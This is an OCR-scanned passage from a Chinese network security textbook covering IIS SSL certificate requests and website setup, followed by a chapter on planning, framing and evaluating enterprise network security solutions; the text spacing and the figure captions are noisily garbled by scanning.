第 三 步 ,选择 “高 级 申请 ”, 以 便 导入 前 面 生成 的 IIS 证 书 。 由 于 证 书 文件 是 base64 编 
码 的 ,所 以 应 该 选择 “使 用 base64 编码 的 PKCS#10 文件 提交 一 个 证 书 申请 ,或 使 用 base64 
编码 的 PKCS#7 文件 更 新 证 书 申请 ”, 如 图 12-38 所 示 


高 级 证 书 申请 


您 可 ti 自己 ， 其 他 用 户 ， 或 计算 机 申请 一 个 证 书 。 请 注音 证书 颁发 机 构 (CA) 的 策略 将 
诀 定 您 能 获得 的 证 : 


© 〇 使 用 表格 向 这 个 CA 提交 一 个 证 书 申请 。 


© 最 编码 的 PKCS 条 0 文件 再 交 一 个 证 书 甲 请 ， 或 使 用 base64 编码 的 PKCS #7 文件 更 新 妆 


〇 使 用 智能 卡 注册 站 为 代表 另 一 用 户 的 智能 卡 申 请 一 个 证 书 。 
不必 将 冯 一 个 蔡 孵 从 序 证 内 信 为 号 一 忆 户 纸 父 一 个 册 斌 。 


12-38 ”选择 申请 证 书 
第 四 步 ,复制 证 书 文件 web. txt 的 内 容 在 如 图 12-39 所 示 的 文本 框 中 。 


第 五 步 , 单 击 “ 提 交 ” 按 钮 后 ,出 现 如 图 12-40 所 示 证 书 挂 起 的 界面 。 此 时 说 明证 书 已 经 
被 提交 。 
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提交 一 个 保存 的 请 
粘贴 一 个 base64 编码 的 PKCS #10 证 书 申请 或 由 外 部 应 用 程序 (如 web 浏览 器 ) 生 成 的 PECS #7 更 新 申 
请 到 申请 宇 段 以 提交 一 个 申请 到 证 书 颁发 机 构 (CA) 。 
保存 的 申请 : 
人 
Base64 编码 VQQHEwdsYW56aG91MQOwCwYDVQQKEwRMQUPUMREw 
书 申请 MA4GATI qhkicG9w0B 
(PKCS #10 或 #7): IBjSoc2c3ei LV/Bw5bLL6uQ5hx7TvCuhn47 
es ee | 
浏览 要 插入 的 文件 。 
图 12-39 复制 证 书 内 容 
证 书 挂 起 
您 的 证 书 申请 己 经 收 到 。 不 过 ， 您 必须 等 符 管理 员 发 布 您 申请 的 证 书 。 
请 在 一 天 或 两 天 内 回 到 此 web 站 点 以 检索 您 的 证 书 。 
注意 : 候 必 须 用 此 web 祝 | 监 咯 在 10 天 内 返回 以 检索 你 的 证 书 
图 12-40 证 书 挂 起 
至 此 ,SSL 证 书 申请 成 功 , 即 可 用 来 创建 SSL 网 站 了 。 
(创建 SS 网 站 。 3 
第 一 步 ,在 DNS 服务 器 上 创建 主机 , 设 i ee 
置 DNS 域名 ,并 使 其 IP 地 址 指向 SSL 网 站 A 
的 IP 地址 。 Ewsst | 
传递 身份 验证 
第 二 步 ,返回 Web 服务 器 ,在 IIS 管理 器 连接 为 C) 。 独 开 设 轩 @ 
中 创建 一 个 SSL 网 站 。 在 “类 型 "下 拉 列 表 中 
选择 https, 在 “IP 地 址 ”文本 框 中 指定 IP 地 用 | 
址 ,“ 端 口 ”文本 框 中 使 用 默认 的 443 即 可 。 | 关于 一 一 一 一 
在 “SSL 证 书 ” 下 拉 列 表 中 选择 所 申请 的 证 IE 
书 , 如 图 12-41 所 示 。 反 立即 启动 网 站 吕 
第 三 步 , 单 击 “ 确 定 ” 按 钮 ,SSL 网 站 创建 me 


图 12-41 添加 SSL 网 站 
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本 章 学 习 要 求 : 

。 了 解 网 络 安全 方案 设计 的 要 点 。 

。 掌握 网 络 安全 方案 的 框架 。 

。 熟悉 如 何 从 网 络 安全 工程 的 角度 来 编写 网 络 安 全 方案 。 
。 了 解 网 络 安全 评估 的 目的 及 意义 。 

。 掌握 网 络 安全 评估 的 服务 内 容 。 

。 了 解 网 络 安全 评估 方案 实例 。 

。 掌握 大 型 企业 网 络 安全 规划 设计 内 容 。 


13.1 网 络 安全 方案 概念 


网 络 安全 方案 可 以 认为 是 一 张 施工 的 图 纸 ,图纸 的 好 坏 直接 影响 到 工程 的 质量 高 低 。 
总 的 来 说 ,网 络 安全 方案 涉及 的 内 容 比较 多 .比较 广 .比较 专业 和 实际 。 


13.1.1 网 络 安全 方案 设计 的 要 点 


对 于 一 名 从 事 网 络 安全 的 人 来 说 ,网 络 必须 有 一 个 整体 、 动 态 的 安全 概念 。 总 的 来 说 ， 
就 是 要 在 整个 项 目 中 ,有 一 种 总 体 把 握 的 能 力 ,不 能 只 关注 自己 熟悉 的 某 一 领域 ,而 对 其 他 
领域 毫 不 关心 ,甚至 不 理解 ,否则 就 写 不 出 一 份 好 的 安全 方案 ,因为 写 出 来 的 方案 要 针对 用 
户 所 遇 到 的 问题 ,运用 产品 和 技术 解决 问题 。 设 计 人 员 只 有 对 安全 技术 了 解 得 很 深 , 对 产品 
了 解 得 比较 全 面 , 写 出 来 的 方案 才能 接近 用 户 的 需求 。 

一 份 好 的 网 络 安全 解决 方案 ,不 仅 要 考虑 到 技术 ,还 要 考虑 到 策略 和 管理 。 技 术 是 关 
键 , 策 略 是 核心 ,管理 是 保证 。 在 方案 中 ,始终 要 体现 出 这 三 方面 的 关系 。 

在 设计 网 络 安全 方案 时 ,一 定 要 了 解 用 户 实际 网 络 系统 的 环境 ,对 当前 可 能 遇 到 的 安全 
风险 和 威胁 进行 量化 和 评估 ,这 样 才能 写 出 一 份 客观 的 解决 方案 。 好 的 方案 是 一 个 安全 项 
目 中 很 重要 的 部 分 ,是 项 目 实施 的 基础 和 依据 。 

在 设计 方案 时 ,动态 安全 是 一 个 很 重要 的 概念 ,也 是 网 络 安全 方案 和 其 他 项 目 方案 的 最 
大 区 别 。 动 态 安全 ,就 是 随 着 环境 的 变化 和 时 间 的 推移 ,这 个 系统 的 安全 性 会 发 生变 化 , 变 
得 不 安全 ,所 以 在 设计 方案 时 ,不 仅 要 考虑 到 现在 的 情况 ,也 要 考虑 到 将 来 的 情况 ,用 一 种 动 
态 的 方式 来 考虑 ,做 到 项 目的 实施 既 能 考虑 到 现在 的 情况 ,也 能 很 好 地 适应 以 后 网 络 系统 的 
升级 , 留 有 一 个 比较 好 的 升级 接口 。 

网 络 没有 绝对 的 安全 ,只 有 相对 的 安全 。 在 设计 网 络 安全 方案 时 ,必须 清楚 这 一 点 ,以 
一 种 客观 的 态度 来 写 , 不 夸大 也 不 缩小 , 写 得 实 实在 在 ,让 人 信服 接受 。 由 于 时 间 和 空间 不 


第 13 章 ”网络 安全 规划 、 设 计 与 评估 361 


断 发 生 作用 ,安全 不 是 绝对 的 ,不管 在 设计 还 是 在 实施 的 时 候 , 想 得 多 完善 ,做 得 多 严密 ,都 
不 能 达到 绝对 的 安全 。 所 以 在 方案 中 应 该 告诉 用 户 ,只 能 做 到 避免 风险 , 减 小 风险 的 根源 ， 
降低 由 于 风险 所 带 来 的 危害 ,而 不 能 做 到 完全 消除 风险 。 

在 网 络 安全 中 ,动态 性 和 相对 性 非常 重要 ,可 以 从 系统 .人 和 管理 三 个 方面 来 理解 。 系 
统 是 基础 .认识 是 核心 .管理 是 保证 。 从 项 目 实施 上 来 讲 , 这 三 个 方面 是 项 目 质量 的 保证 。 
操作 系统 是 一 个 很 复杂 、 很 庞大 的 体系 ,在 设计 和 实施 时 ,考虑 安全 的 因素 可 能 比较 少 ,总 会 
存在 这 样 或 那样 的 人 为 错误 ,这 些 错 误 的 直接 后 果 就 是 带 来 安全 方面 的 风险 。 而 且 总 有 一 
些 黑客 以 挖掘 系统 的 安全 漏洞 和信 侵 系统 为 荣 。 从 这 个 方面 来 讲 , 系 统 在 明 处 ,黑客 在 暗 处 ， 
网 络 系统 遭受 攻击 的 情形 防不胜防 。 

在 一 个 项 目 中 ,人 总 是 核心 。 一 个 人 的 技术 水 平 . 思 想 行为 和 心理 素质 等 都 会 影响 到 项 
目的 质量 。 比 如 项 目的 密码 要 复杂 ,要 采用 大 小 写 .数字 和 特殊 字符 等 的 组 合 ,但 如 果 在 实 
际 使 用 中 ,一 个 系统 管理 员 的 管理 账号 的 密码 使 用 的 是 自己 的 生日 ,这 样 的 系统 放 在 网 上 ， 
一 般 不 能 坚持 得 太 久 。 管 理 是 关键 ,系统 的 安全 配置 .动态 跟踪 、 人 的 有 效 管理 都 要 通过 管 
理 来 约束 和 保证 。 


13.1.2 评价 网 络 安全 方案 的 质量 


在 实际 工作 中 ,怎样 才能 写 出 高 质量 、 高 水 平 的 安全 方案 ? 只 要 抓 住 重点 ,理解 安全 理 
念 和 安全 过 程 ,基本 就 可 以 做 到 。 一 个 网 络 安全 方案 要 从 以 下 8 个 方面 来 把 握 。 

(1) 体现 唯一 性 。 由 于 安全 的 复杂 性 和 特殊 性 ,唯一 性 是 评估 安全 方案 最 重要 的 一 个 
标准 。 实 际 中 ,每 一 个 特定 网 络 都 是 唯一 的 ,需要 根据 实际 情况 来 处 理 。 

(2) 对 安全 技术 和 安全 风险 有 一 个 综合 把 握 和 理解 ,包括 现在 和 将 来 可 能 出 现 的 所 有 
情况 。 

(3) 对 用 户 的 网 络 系统 可 能 遇 到 的 安全 风险 和 安全 威胁 ,结合 现 有 的 安全 技术 和 安全 
风险 ,要 有 一 个 合适 .中 肯 的 评估 ,不 能 夸大 ,也 不 能 缩小 。 

(4) 对 症 下 药 ,用 相应 的 安全 产品 ,安全 技术 和 管理 手段 ,降低 用 户 的 网 络 系统 当前 可 
能 遇 到 的 风险 和 威胁 ,消除 风险 和 威胁 的 根源 ,增强 整个 网 络 系统 抵抗 风险 和 威胁 的 能 力 ， 
增强 系统 本 身 的 免疫 力 。 

(5) 方案 中 要 体现 出 对 用 户 的 服务 支持 ,这 是 很 重要 的 一 部 分 。 因 为 产品 和 技术 ,都 将 
会 体现 在 服务 中 ,服务 用 来 保证 质量 、 提 高 质量 。 

(6) 在 设计 方案 时 ,要 明白 网 络 系统 安全 是 一 个 动态 的 、 整 体 的 、 专 业 的 工程 ,不 能 一 步 
到 位 解决 用 户 所 有 的 问题 。 

(7) 方案 出 来 后 ,要 不 断 与 用 户 进行 沟通 ,能 够 及 时 得 到 他 们 对 网 络 系统 在 安全 方面 的 
要 求 , 期 望 和 所 遇 到 的 问题 。 

(8) 方案 中 所 涉及 的 产品 和 技术 ,都 要 经 得 起 验证 、 推 殴 和 实施 ,要 有 理论 根据 ,也 要 有 

将 上 面 的 8 点 融会 贯通 ,经 过 不 断 地 学 习 和 经 验 积累 :一定 能 写 出 一 份 很 实用 、 很 中 肯 
的 安全 项 目 方案 。 一 份 很 好 的 解决 方案 要 求 的 是 技术 面 要 广 , 能 体现 综合 性 。 
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13.2 网 络 安全 方案 的 框架 


总 体 上 说 ,一 份 安全 解决 方案 的 框架 涉及 6 大 方面 ,可 以 根据 用 户 的 实际 需求 进行 
取舍 。 

1. 概要 安全 风险 分 析 

对 当前 的 安全 风险 和 安全 威胁 做 一 个 概括 和 分 析 , 最 好 能 够 突出 用 户 所 在 的 行业 ,并 结 
合 其 业务 的 特点 、 网 络 环境 和 应 用 系统 等 。 同 时 ,要 有 针对 性 ,如 政府 行业 、 电 力行 业 、 金 融 
行业 等 ,要 体现 很 强 的 行业 特点 ,使 人 信服 和 接受 。 

2. 实际 安全 风险 分 析 

实际 安全 风险 分 析 一 般 从 4 个 方面 进行 : 网 络 的 风险 和 威胁 分 析 , 系 统 的 风险 和 威胁 
分 析 , 应 用 的 风险 和 威胁 分 析 , 对 网 络 、 系 统 和 应 用 的 风险 及 威胁 的 具体 实际 的 详细 分 析 。 

(1) 网 络 的 风险 和 威胁 分 析 : 详细 分 析 用 户 当 前 的 网 络 结构 , 找 出 带 来 安全 问题 的 关 
键 ,并 使 之 图 形 化 ,指出 风险 和 威胁 所 带 来 的 危害 ,对 如 果 不 消除 这 些 风险 和 威胁 ,会 引起 什 
么 样 的 后 果 , 有 一 个 中 肯 、 详 细 的 分 析 和 人 解决 方法 。 

(2) 系统 的 风险 和 威胁 分 析 : 对 用 户 所 有 的 系统 都 要 进行 一 次 详细 的 评估 ,分 析 存 在 
哪些 风险 和 威胁 ,并 根据 与 业务 的 关系 ,指出 其 中 的 利害 关系 。 要 运用 当前 流行 系统 所 面临 
的 安全 分 析 和 威胁 ,结合 用 户 的 实际 系统 ,给 出 一 个 中 肯 、 客 观 和 实际 的 分 析 。 

(3) 应 用 的 风险 和 威胁 分 析 : 应 用 的 安全 是 企业 的 关键 ,也 是 安全 方案 中 最 终 说 服 的 
要 保护 的 对 象 。 同 时 由 于 应 用 的 复杂 性 和 关联 性 ,分 析 时 要 比较 综合 。 

(4) 对 网 络 、 系 统 和 应 用 的 风险 及 威胁 的 具体 实际 的 详细 分 析 : 帮助 用 户 找 出 其 网 络 
系统 中 要 保护 的 对 象 , 帮助 用 户 分 析 网 络 系统 ,帮助 他 们 发 现 其 网 络 系统 中 存在 的 问题 ,以 
及 采用 哪些 产品 和 技术 来 解决 。 

3. 网 络 系统 的 安全 原则 

安全 原则 体现 在 5 个 方面 : 动态 性 ,唯一 性 、 整 体 性 .专业 性 和 严密 性 。 

(1) 动态 性 : 不 要 把 安全 静态 化 ,动态 性 是 安全 的 一 个 重要 的 原则 。 网 络 、 系 统 和 应 用 
会 不 断 出 现 新 的 风险 和 威胁 ,这 决定 了 安全 动态 性 的 重要 性 。 

(2) 唯一 性 : 安全 的 动态 性 决定 了 安全 的 唯一 性 ,针对 每 个 网 络 系统 安全 的 解决 ,都 应 
该 是 独一无二 的 。 

(3) 整体 性 : 对 网 络 系统 所 遇 到 的 风险 和 威胁 ,要 从 整体 来 分 析 和 把 握 , 不 能 哪里 有 问 
题 就 补 哪里 ,要 做 到 全 面 的 保护 和 评估 。 

(4) 专业 性 : 对 于 用 户 的 网 络 、 系 统 和 应 用 ,要 从 专业 的 角度 来 分 析 和 把 握 ,不 能 是 一 
种 大 概 的 做 法 。 

(5) 严密 性 : 整个 解决 方案 ,要 有 一 种 很 强 的 严密 性 ,不 要 给 人 一 种 虚假 的 感觉 ,在 设 
计 方 案 的 时 候 ,需要 从 多 方面 对 方案 进行 论证 。 

4. 安全 产品 

常用 的 安全 产品 有 5 种 : 防火 墙 . 防 病毒 身份 认 证 ,传输 加 密 和 入 侵 检测 。 结 合用 户 
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的 网 络 、 系 统 和 应 用 的 实际 情况 ,对 安全 产品 和 安全 技术 做 评估 和 分 析 , 分 析 要 客观 ,结果 要 
中 肯 ,帮助 用 户 选择 最 能 解决 他 们 所 遇 到 问题 的 产品 ,不 要 求 新 `. 求 好 和 求 大 。 

(1) 防火 墙 : 对 包 过 滤 技 术 、 代 理 技 术 和 状态 检测 技术 的 防火 墙 ,都 做 一 个 概括 和 比 
较 , 结 合用 户 网 络 系统 的 特点 ,帮助 用 户 选择 一 种 安全 产品 ,对 于 选择 的 产品 ,一 定 要 从 中 立 
的 角度 来 说 明 。 

(2) 防 病毒 : 针对 用 户 的 系统 和 应 用 的 特点 ,对 桌面 防 病毒 .服务 器 防 病毒 和 网 关 防 病 
毒 做 一 个 概括 和 比较 ,详细 指出 用 户 必 须 如 何 做 ,否则 就 会 带 来 什么 样 的 安全 威胁 ,一 定 要 
中 肯 、 合 适 ,不 要 夸大 和 缩小 。 

(3) 身份 认证 : 从 用 户 的 系统 和 用 户 的 认证 的 情况 进行 详细 的 分 析 , 指 出 网 络 和 应 用 
本 身 的 认证 方法 会 出 现 哪些 风险 ,结合 相关 的 产品 和 技术 ,通过 部 署 这 些 产 品 和 采用 相关 的 
安全 技术 ,能 够 帮助 用 户 解决 哪些 由 系统 和 应 用 的 传统 认证 方式 所 带 来 的 风险 和 威胁 。 

(4) 传输 加 密 : 要 用 加 密 技 术 来 分 析 ,指出 明文 传输 的 巨大 危害 ,通过 结合 相关 的 加 密 
产品 和 技术 ,能 够 指出 用 户 的 现 有 情况 存在 哪些 危害 和 风险 。 

(5) 入 侵 检测 : 对 入 侵 检测 技术 要 有 一 个 详细 的 解释 ,指出 在 用 户 的 网 络 和 系统 部 署 
了 相关 的 产品 之 后 ,对 现 有 的 安全 情况 会 产生 怎样 的 影响 等 要 有 一 个 详细 的 分 析 。 结 合 相 
关 的 产品 和 技术 ,指出 对 用 户 的 系统 和 网 络 会 带 来 哪些 好 处 ,指出 为 什么 必须 要 这 样 做 ,不 
这 样 做 会 怎么 样 ,会 带 来 什么 样 的 后 果 。 

5. 风险 评估 

风险 评估 是 工具 和 技术 的 结合 ,通过 这 两 个 方面 的 结合 ,给 用 户 一 种 很 实际 的 感觉 ,使 
用 户 感到 这 样 做 过 以 后 ,会 对 他 们 的 网 络 产生 一 个 很 大 的 影响 。 

6. 安全 服务 

安全 服务 不 是 产品 化 的 东西 ,而 是 通过 技术 向 用 户 提供 的 持久 支持 。 对 于 不 断 更 新 的 
安全 技术 、 安 全 风险 和 安全 威胁 ,安全 服务 的 作用 变 得 越 来 越 重 要 。 

(1) 网 络 拓扑 安全 : 结合 网 络 的 风险 和 威胁 ,详细 分 析 用 户 的 网 络 拓 扑 结构 ,根据 其 特 
点 ,指出 现在 和 将 来 会 存在 哪些 安全 风险 和 威胁 ,并 运用 相关 的 产品 和 技术 ,来 帮助 用 户 消 
除 产生 风险 和 威胁 的 根源 。 

(2) 系统 安全 加 固 : 通过 风险 评估 和 人 工分 析 , 找 出 用 户 的 相关 系统 已 经 存在 或 是 将 
来 会 存在 的 风险 和 威胁 ,并 运用 相关 的 产品 和 技术 ,来 加 固 用 户 的 系统 安全 。 

(3) 应 用 安全 : 结合 用 户 的 相关 应 用 程序 和 后 台 支 撑 系 统 ,通过 相应 的 风险 评估 和 人 
工分 析 , 找 出 用 户 和 相关 应 用 已 经 存在 或 是 将 来 会 存在 的 风险 ,并 运用 相关 的 产品 和 技术 ， 
来 加 固 用 户 的 应 用 安全 。 

(4) 灾难 恢复 : 结合 用 户 的 网 络 、 系 统 和 应 用 ,通过 详细 的 分 析 、 针 对 可 能 遇 到 的 灾难 ， 
制定 出 一 份 详细 的 恢复 方案 ,把 由 于 其 他 突 发 情况 所 带 来 的 风险 降 到 最 低 , 并 有 一 个 良好 的 
应 对 方案 。 

(5) 紧急 响应 : 对 于 突 发 的 安全 事件 需要 采用 相关 的 处 理 流 程 , 比 如 服务 器 死机 、 停 
电 等 。 

(6) 安全 规范 : 制定 出 一 套 完善 的 安全 方案 ,比如 IP 地 址 固定 、 离 开 计算 机 时 需要 锁定 
等 。 结 合 实际 分 成 多 套 方案 ,如 系统 管理 员 安 全 规范 、 网 络 管理 员 安 全 规范 、 高 层 领导 的 安 
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全 规范 ,普通 员工 的 管理 规范 ,设备 使 用 规范 和 安全 环境 规范 。 
(7) 服务 体系 和 培训 体系 : 提供 售 前 和 售后 服务 ,并 提供 安全 产品 和 技术 的 相关 培训 。 


13.3 网 络 安全 案例 的 需求 分 析 


网 络 安全 的 唯一 性 和 动态 性 决定 了 不 同 的 网 络 需要 有 不 同 的 解决 方案 。 通 过 一 个 与 实 
际 相 类 似 的 案例 ,可 以 提高 安全 方案 设计 能 力 。 本 案例 的 项 目 名 称 是 : 某 特定 信息 集团 公 
司 网 络 信息 系统 的 安全 管理 。 


13.3.1 项 目 要 求 


集团 在 网 络 安 全 方面 提出 以 下 5 方面 的 要 求 。 

1. 安全 性 

全 面 有 效 地 保护 企业 网 络 系统 的 安全 ,保护 计算 机 硬件 、 软 件 、 数 据 、 网 络 不 因 偶 然 的 或 
恶意 破坏 的 原因 使 数据 遭 到 更 改 、 泄 漏 和 丢失 ,确保 数据 的 完整 性 。 

2. 可 控 性 和 可 管理 性 

可 自动 和 手动 分 析 网 络 安全 状况 ,适时 检测 并 及 时 发 现 记 录 潜 在 的 安全 威胁 ,制定 安全 
策略 ,及 时 报警 、 阻 断 不 良 攻 击 行 为 ,具有 很 强 的 可 控 性 和 可 管理 性 。 

3. 系统 的 可 用 性 

在 某 部 分 系统 出 现 问题 时 ,不 影响 企业 信息 系统 的 正常 运行 ,具有 很 强 的 可 用 性 和 及 时 
恢复 性 。 

4. 可 持续 发 展 

满足 某 特定 信息 集团 公司 业务 需求 和 企业 可 持续 发 展 的 要 求 , 具 有 很 强 的 可 扩展 性 和 
和 柔 杞 性 。 

5. 合法 性 

所 采用 的 安全 设备 和 技术 具有 我 国安 全 产品 管理 部 门 的 合法 证 明 。 


13.3.2 工作 任务 


该 项 目的 工作 任务 在 于 以 下 4 个 方面 。 

(1) 研究 某 特定 信息 集团 公司 计算 机 网 络 系统 (包括 各 级 机 构 、 基 层 生产 单 位 和 移动 用 
户 的 广域网 ) 的 运行 情况 (包括 网 络 结构 性能、 信息 点 数量 .采取 的 安全 措施 等 ), 对 网 络 面 
临 的 威胁 及 可 能 承担 的 风险 进行 定性 与 定量 的 分 析 和 评估 。 

(2) 研究 某 特定 信息 集团 公司 的 计算 机 操作 系统 (包括 服务 器 操作 系统 、 客 户 端 操作 系 
统 等 ) 的 运行 情况 (包括 操作 系统 的 版 本 、 提 供 的 用 户 权 限 分 配 策略 等 ) ,在 操作 系统 最 新 发 
展 趋势 的 基础 上 ,对 操作 系统 本 身 的 缺陷 及 可 能 承担 的 风险 进行 定性 与 定量 的 分 析 和 评估 。 

(3) 研究 某 特定 信息 集团 公司 的 计算 机 应 用 系统 (包括 信息 管理 系统 、 办 公有 自动 化 系 
统 、 运 行 实时 管理 系统 、 地 理 信 息 系统 和 Internet/Intranet 信息 发 布 系统 等 ) 的 运行 情况 ( 包 
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括 应 用 体系 结构 开发 工具 、 数 据 库 软 件 和 用 户 权限 分 配 策略 等 ) ,在 满足 各 级 管理 人 员 、 业 
务 操作 人 员 的 业务 需求 基础 上 ,对 应 用 系统 存在 的 问题 ,面临 的 威胁 及 可 能 承担 的 风险 进行 
定性 与 定量 的 分 析 和 评估 。 

(4) 根据 以 上 的 定性 与 定量 的 评估 ,结合 用 户 需求 和 国内 外 网 络 安全 最 新 发 展 趋势 ,有 
针对 性 地 制定 某 特定 信息 集团 公司 计算 机 网 络 系统 的 安全 策略 和 解决 方案 ,确保 该 集团 计 
算 机 网 络 信息 系统 安全 可 靠 地 运行 。 


13.4 网 络 安全 解决 方案 设计 与 分 析 


某 特定 网 络 安全 公司 通过 招标 ,以 50 万 元 人 民 币 的 工程 造价 得 到 该 项 目的 实施 权 。 在 
解决 方案 设计 中 需要 包含 9 方面 的 内 容 : 公司 背景 简介 、 某 特定 信息 集团 的 安全 风险 分 析 、 
完整 网 络 安全 实施 方案 的 设计 、 实 施 方案 计划 ,技术 支持 和 服务 承诺 、 产 品 报价 、 产 品 介绍 、 
第 三 方 检测 报告 和 安全 技术 培训 。 


13.4.1 公司 背景 简介 


介绍 某 特定 网 络 安全 公司 的 背景 ,通常 包括 : 公司 简介 、 公 司 人 员 结 构 、 曾 经 成 功 的 案 
例 、 产 品 或 者 服务 的 许可 证 或 认证 。 

1. 某 特定 网 络 安全 公司 简介 

某 特定 网 络 安全 公司 于 2004 年 成 立 并 通过 ISO9001 认证 ,注册 资本 1000 万 元 人 民 币 。 
公司 主要 提供 网 络 安全 产品 和 网 络 安全 解决 方案 ,公司 的 安全 理念 是 PPDRRM,PPDRRM 
将 给 用 户 带 来 稳定 安全 的 网 络 环境 ,PPDRRM 策略 覆盖 了 安全 项 目 中 的 产品 、 技 术 、 服 务 、 
管理 和 策略 等 内 容 ,是 一 个 完善 严密、 整体 和 动态 的 安全 理念 。 

(1) 综合 的 网 络 安全 策略 (Policy) ,也 就 是 PPDRRM 的 第 一 个 P, 结 合用 户 的 网 络 系统 
实际 情况 来 实施 ,包括 : 环境 安全 策略 ,系统 安全 策略 、 网 络 安全 策略 等 。 

(2) 全 面 的 网 络 安 全 保护 (Protect) ,PPDRRM 中 的 第 二 个 P, 提 供 全 面 的 保护 措施 , 包 
括 安 全 产品 和 技术 ,要 结合 用 户 网 络 系统 的 实际 情况 来 介绍 ,内 容 包括 防火 墙 保护 、 防 病毒 
保护 、 身 份 验 证 保护 、 入 侵 检测 保护 。 

(3) 连续 的 安全 风险 监测 (Detect) ,PPDRRM 中 的 D, 通 过 评估 工具 、 漏 洞 检测 技术 和 
安全 人 员 ,对 用 户 的 网 络 , 系 统 和 应 用 中 可 能 存在 的 安全 风险 和 威胁 ,进行 全 面 的 检测 。 

(4) 及 时 的 安全 事故 响应 (Response) ,PPDRRM 中 的 第 一 个 R, 对 用 户 的 网 络 、 系 统 和 
应 用 可 能 遇 到 的 安全 入 侵 事 件 及 时 做 出 响应 和 解决 。 

(5) 迅速 的 安全 灾难 恢复 (Recovery),PPDRRM 中 的 第 二 个 R, 当 网 页 .文件 数据库、 
网 络 和 系统 等 遇 到 破坏 时 ,采用 迅速 恢复 技术 。 

(6) 优质 的 安全 管理 服务 (Management) ,PPDRRM 中 的 M, 在 安全 项 目 中 ,管理 是 项 
目 实施 成 功 有 效 的 保证 。 

2. 公司 的 人 员 结 构 

某 特 定 网 络 安全 公司 现 有 管理 人 员 20 名 ,技术 人 员 200 名 ,销售 人 员 400 名 。 其 中 具 
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有 副 高 级 职称 以 上 的 有 39 名 ,教授 或 者 研究 员 12 名 ,院士 两 名 ,硕士 学 位 以 上 人 员 占 所 有 
人 员 的 比例 为 49% ,是 一 个 知识 性 、 技 术 性 的 高 科技 公司 。 

3. 成 功 的 案例 

这 里 主要 介绍 公司 以 往 的 成 功 案例 ,特别 是 要 指出 与 用 户 项 目 相似 的 项 目 , 这 样 可 以 使 
用 户 相信 有 足够 的 经 验 来 做 好 这 件 事 情 。 

4. 产品 的 许可 证 或 服务 认证 

产品 的 许可 证 ,是 不 可 缺少 的 材料 ,因为 只 有 取得 了 许可 证 的 安全 产品 , 才 允 许 在 国内 
销售 。 网 络 安全 属于 提供 服务 的 公司 ,通过 国际 认证 大 大 有 利于 得 到 用 户 的 信任 。 

5. 某 特定 信息 集团 实施 网 络 安全 意义 

这 一 部 分 着 重 写 出 ,项 目 完成 以 后 , 某 特定 信息 集团 公司 的 系统 信息 安全 能 够 达到 一 个 
怎样 的 安全 保护 水 平 ,特别 是 要 结合 当前 的 安全 风险 和 威胁 来 分 析 。 
13.4.2 安全 风险 分 析 


安全 风险 分 析 就 是 对 网 络 物理 结构 、 网 络 系统 和 应 用 进行 风险 分 析 。 

1. 现 有 网 络 物理 结构 安全 分 析 

详细 分 析 某 特定 信息 集团 公司 与 分 公司 的 网 络 结构 ,包括 内 部 网 、 外 部 网 和 远程 网 。 

2. 网 络 系统 安全 分 析 

详细 分 析 某 特定 信息 集团 公司 与 各 分 公司 网 络 的 实际 连接 .Internet 的 访问 情况 .桌面 
系统 的 使 用 情况 和 主机 系统 的 使 用 情况 , 找 出 可 能 存在 的 安全 风险 。 

3. 网 络 应 用 的 安全 分 析 

详细 分 析 某 特定 信息 集团 公司 与 各 分 公司 的 所 有 服务 系统 的 各 应 用 系统 , 找 出 可 能 存 
在 的 安全 风险 。 
13.4.3 解决 方案 


解决 方案 包括 5 个 方面 。 

1. 建立 某 特定 信息 集团 公司 系统 信息 安全 体系 结构 框架 

通过 具体 分 析 某 特定 信息 集团 公司 的 具体 业务 和 网 络 、 系 统 、 应 用 等 的 实际 情况 ,初步 
建立 一 个 整体 的 安全 体系 框架 。 

2. 技术 实施 策略 

技术 实施 策略 需要 从 8 个 方面 进行 阐述 。 

(1) 网 络 结构 安全 : 通过 以 上 的 风险 分 析 , 找 出 网 络 结构 可 能 出 现 的 问题 ,采用 相关 的 
安全 产品 和 技术 ,解决 网 络 结构 的 安全 风险 和 威胁 。 

(2) 主机 安全 加 固 : 通过 以 上 的 风险 分 析 , 找 出 主机 系统 可 能 出 现 的 问题 ,采用 相关 的 
安全 产品 和 技术 ,解决 主机 系统 的 安全 风险 和 威胁 。 

(3) 防 病 毒 : 阐述 如 何 实施 桌面 防 病毒 、. 服 务 器 防 病毒 .邮件 防 病毒 网关 防 病毒 及 统 
一 防 病毒 解决 方案 。 
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(4) 访问 控制 : 三 种 基本 的 访问 控制 技术 为 路 由 器 过 滤 访 问 控制 技术 、 防 火 墙 访问 控 
制 技术 和 主机 自身 访问 控制 技术 。 

(5) 传输 加 密 : 通过 采用 相关 的 加 密 产 品 和 加 密 技术 ,保护 某 特定 信息 集团 公司 的 信 
息 传 输 安全 ,实现 信息 传输 的 机 密 性 、 完 整 性 和 可 用 性 。 

(6) 身份 认证 : 通过 采用 相关 的 身份 认证 产品 和 技术 ,保护 重要 应 用 系统 的 身份 认证 ， 
实现 信息 使 用 的 加 密 性 和 可 用 性 。 

(7) 入 侵 检 测 技术 : 通过 采用 相关 的 入 侵 检 测 产 品 和 技术 ,对 网 络 和 重要 主机 系统 进 
行 实时 监控 。 

(8) 风险 评估 : 通过 采用 相关 的 风险 评估 工具 和 技术 ,对 网 络 和 重要 主机 系统 进行 连 
续 的 风险 和 威胁 分 析 。 

3. 安全 管理 工具 

对 安全 项 目 中 所 用 到 的 安全 产品 进行 集中 、 统 一 、 安 全 的 管理 和 培训 。 

4. 紧急 响应 

制定 详细 的 紧急 响应 计划 ,及 时 响应 用 户 的 网 络 、 系 统 和 应 用 可 能 会 遭 到 的 破坏 。 

5. 灾难 恢复 

制定 详细 的 灾难 恢复 计划 ,及 时 地 把 用 户 遇 到 的 网 络 、 系 统 和 应 用 的 破坏 恢复 到 正常 状 
态 , 并 且 能 够 消除 产生 风险 和 威胁 的 根源 。 


13.4.4 实施 方案 


实施 方案 包括 : 项 目 管理 和 项 目 质量 保证 。 

1. 项 目 管理 

项 目 管理 包括 : 项 目 流程 项 目 管理 制度 和 项 目 进度 。 

(1) 项 目 流程 : 详细 写 出 项 目的 实施 流程 ,以 保证 项 目的 顺利 实施 。 

(2) 项 目 管理 制度 : 写 出 项 目的 管理 制度 ,主要 是 保证 项 目的 实施 质量 。 项 目 管理 主 
要 包括 人 的 管理 .产品 的 管理 和 技术 的 管理 。 

(3) 项 目 进度 : 项 目 实施 的 进度 表 , 作 为 项 目 实施 的 时 间 标 准 , 要 全 面 考虑 完成 项 目 所 
